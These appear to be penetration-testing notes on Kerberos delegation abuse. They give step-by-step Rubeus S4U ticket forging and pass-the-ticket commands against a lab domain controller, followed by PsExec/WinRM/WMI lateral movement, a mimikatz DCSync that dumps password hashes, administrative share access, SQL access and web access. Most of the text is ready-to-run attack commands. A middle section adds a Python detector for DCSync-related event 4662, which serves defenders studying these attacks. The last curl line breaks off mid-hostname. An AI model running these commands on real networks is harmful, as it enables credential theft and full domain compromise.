# Service Tickets and Abuses

**1. Service Ticket for HOST (Lateral Movement with PsExec, wmi, winrm)**

The `HOST` service ticket can be used for lateral movement because the remote-execution services PsExec, WMI and WinRM all authenticate against it. PsExec allows you to run commands on remote systems.

**Steps:**

* **Obtain the HOST service ticket:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:host /user:sql-1$ /ticket:<base64TGT> /nowrap
  ```
* **Save the service ticket to a file:**

  ```powershell
  C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Inject the ticket using Rubeus:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Use PsExec to run commands on the target system:**

  ```powershell
  C:\Users\Alex> psexec.exe \\dc.dev.dhitalcorp.local cmd
  ```
* **Access WinRM:**

  ```powershell
  C:\Users\Alex> Enter-PSSession -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))
  ```
* **Access WMI:**

  ```powershell
  C:\Users\Alex> Get-WmiObject -Class Win32_OperatingSystem -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))
  ```

**2. Service Ticket for LDAP (DC Sync Attack)**

The `LDAP` service ticket can be used for DCSync attacks, which abuse the Directory Replication Service (DRS) to replicate password hashes from a Domain Controller.

**Steps:**

* **Obtain the LDAP service ticket:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:ldap /user:sql-1$ /ticket:<base64TGT> /nowrap
  ```
* **Save the service ticket to a file:**

  ```powershell
  C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Inject the ticket using Rubeus:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Perform the DC Sync attack using mimikatz:**

  ```powershell
  C:\Users\Alex> mimikatz.exe
  mimikatz # lsadump::dcsync /user:dc$
  ```
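From the defender's side, the replication request that a DCSync performs is visible on the Domain Controller as Security event 4662 against the domain object, carrying the `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` control-access GUIDs, provided Directory Service Access auditing is enabled. The script below is an added example (not part of these notes and not a Rubeus or mimikatz feature) that flags such events from any principal other than an allowlisted replicator; the key=value record layout and the sample lines are constructed for the example, as is the placeholder GUID in the third line.

```python
import re

# Well-known AD extended-right GUIDs that appear in the Properties field of a
# Security event 4662 when directory replication is requested. Any DCSync-style
# replication request exercises one or both of them.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Constructed, simplified 4662 records as key=value pairs (not real exports).
# Real events carry the GUIDs inside a multi-line "Properties" block; the flat
# shape here is an assumption so the parser stays self-contained. The GUID in
# the third record is a constructed placeholder, not a real schema GUID.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC$ SubjectDomainName=DEV ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=alex SubjectDomainName=DEV ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=alex SubjectDomainName=DEV ObjectType=user "
    "Properties={deadbeef-0000-0000-0000-000000000001}",
    "EventID=4624 SubjectUserName=alex SubjectDomainName=DEV LogonType=3",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value record into a dict; Properties becomes a set of GUIDs."""
    fields = dict(FIELD_RE.findall(line))
    raw = fields.get("Properties", "")
    fields["Properties"] = {g.strip("{}").lower() for g in raw.split(";") if g}
    return fields


def find_dcsync_candidates(lines, allowed_replicators):
    """Return 4662 events in which a non-allowlisted principal requested replication rights."""
    hits = []
    allowed = {a.lower() for a in allowed_replicators}
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        used = ev["Properties"] & REPLICATION_RIGHTS
        if not used:
            continue
        subject = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if subject.lower() in allowed:
            continue
        hits.append({
            "subject": subject,
            "object_type": ev.get("ObjectType"),
            "rights": sorted(used),
        })
    return hits


if __name__ == "__main__":
    # DC computer accounts (and any known directory-sync service account)
    # replicate legitimately and belong on the allowlist.
    for hit in find_dcsync_candidates(SAMPLE_EVENTS, allowed_replicators=["DEV\\DC$"]):
        print(f"possible DCSync: {hit['subject']} on {hit['object_type']} using {hit['rights']}")
```

Note that because the ticket was obtained through S4U for `alex`, the subject recorded on the DC is the impersonated user, not the delegating service account; correlating the 4662 with the preceding 4769 ticket request for `sql-1$` (whose Transited Services field records the S4U2Proxy hop) is what ties the two together.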

**3. Service Ticket for CIFS (File Share Access)**

The `CIFS` service ticket allows you to access file shares on a remote system, enabling you to read, write, or modify files on the target.

**Steps:**

* **Obtain the CIFS service ticket:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /user:sql-1$ /ticket:<base64TGT> /nowrap
  ```
* **Save the service ticket to a file:**

  ```powershell
  C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Inject the ticket using Rubeus:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Access the file share:**

  ```powershell
  C:\Users\Alex> net use \\dc.dev.dhitalcorp.local\c$
  ```

**4. Service Ticket for MSSQLSvc (SQL Server Access)**

The `MSSQLSvc` service ticket can be used to access SQL Server instances, allowing you to run queries and potentially extract data.

**Steps:**

* **Obtain the MSSQLSvc service ticket:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:mssqlsvc /user:sql-1$ /ticket:<base64TGT> /nowrap
  ```
* **Save the service ticket to a file:**

  ```powershell
  C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Inject the ticket using Rubeus:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Access the SQL Server:**

  ```powershell
  C:\Users\Alex> sqlcmd -S dc.dev.dhitalcorp.local -d master -U alex -P <password>
  ```

**5. Service Ticket for HTTP (Web Service Access)**

The `HTTP` service ticket can be used to access web applications running on the target system, allowing for interactions with the web services as the impersonated user.

**Steps:**

* **Obtain the HTTP service ticket:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:http /user:sql-1$ /ticket:<base64TGT> /nowrap
  ```
* **Save the service ticket to a file:**

  ```powershell
  C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Inject the ticket using Rubeus:**

  ```powershell
  C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
  ```
* **Access the web application:**

  You can use tools like `curl` or a browser to access the web service:

  ```powershell
  C:\Users\Alex> curl -H "Authorization: Negotiate <base64ServiceTicket>" http://dc.dev.dhi
  ```
